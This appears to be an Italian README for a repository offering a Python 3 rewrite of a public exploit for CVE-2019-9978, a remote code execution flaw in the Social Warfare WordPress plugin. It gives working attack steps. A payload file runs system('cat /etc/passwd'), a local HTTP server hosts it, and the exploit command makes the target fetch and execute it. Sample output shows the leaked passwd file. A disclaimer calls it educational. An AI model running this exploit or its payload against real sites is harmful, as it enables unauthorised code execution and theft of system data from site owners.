
Una vulnerabilità di Remote Code Execution (RCE) nel plugin Social Warfare per WordPress, che interessa le versioni precedenti alla 3.5.3.
Una vulnerabilità di Esecuzione Remota di Codice (RCE) nel plugin Social Warfare per WordPress, che interessa tutte le versioni precedenti alla 3.5.3.
L'exploit pubblico originale è stato scritto in una versione obsoleta di Python e non funziona più correttamente negli ambienti moderni.
Ho riscritto l'exploit per renderlo completamente compatibile con Python 3, rendendolo più facile da usare, comprendere e integrare negli strumenti moderni.
Crea un file chiamato payload.txt con il seguente contenuto:
<pre>system('cat /etc/passwd')</pre>
Usa Python per servire il tuo payload:
python3 -m http.server 8000
Questo renderà il tuo payload.txt accessibile all'indirizzo:
http://<your-ip>:8000/payload.txt
python3 CVE-2019-9978.py --target http://<target-ip>/wordpress \
--payload-uri http://<your-ip>:8000/payload.txt
Se il target è vulnerabile, riceverai un output simile a:
[*] Received Response From Server!
[<] Received:
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
...



🧬 Se questo payload ti ha rallegrato la giornata, una ⭐ farebbe piacere anche a me.
< 3.5.3⚠️ Disclaimer: Questo repository è solo a scopo educativo e di test etico.
L'uso non autorizzato di questo exploit contro sistemi di cui non si è proprietari è severamente proibito.